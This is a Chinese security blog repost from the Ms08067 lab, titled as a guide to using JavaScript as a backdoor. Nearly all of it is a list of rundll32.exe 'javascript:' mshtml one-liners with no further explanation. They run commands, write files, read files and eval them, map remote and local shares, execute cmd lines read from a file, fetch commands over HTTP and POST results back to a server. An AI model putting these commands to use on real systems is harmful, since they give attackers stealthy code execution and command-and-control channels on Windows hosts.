利用Javascript做后门的利用方式

admin 2021年6月1日04:54:56评论130 views字数 1917阅读6分23秒阅读模式

//Execute A Command

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc");

//Write To A File

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";fso=new%20ActiveXObject("Scripting.FileSystemObject");a=fso.CreateTextFile("c:\Temp\testfile.txt",true);a.WriteLine("Test");a.Close();self.close;

//Read and Execute From A File

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\Temp\testfile.txt",1);eval((f.ReadAll()));

//Map A Remote Share (WEBDAV)

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","https://live.sysinternals.com");self.close;

//Map A Local Share

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";n=new%20ActiveXObject('WScript.Network');n.MapNetworkDrive("S:","\\Localhost\c$");self.close;

//Read and Execute Commands From A File

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\Temp\Commands.txt",1);while(!f.AtEndOfStream){t=new%20ActiveXObject("WScript.Shell");t.Run("cmd%20/c%20"%20+%20f.ReadLine(),null,true);};

//Retrieve Commands From HTTP

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1/a.txt",false);h.Send();B=h.ResponseText;alert(B);

//POST results back to Server

  1. rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("POST","http://127.0.0.1:8081/a.php",false);h.Send("Stuff");


扫描下方二维码学习更多WEB安全知识:

利用Javascript做后门的利用方式





利用Javascript做后门的利用方式
Ms08067安全实验室
专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。
团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。
官方网站:www.ms08067.com

本文始发于微信公众号(Ms08067安全实验室):利用Javascript做后门的利用方式

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年6月1日04:54:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用Javascript做后门的利用方式http://cn-sec.com/archives/292637.html

发表评论

匿名网友 填写信息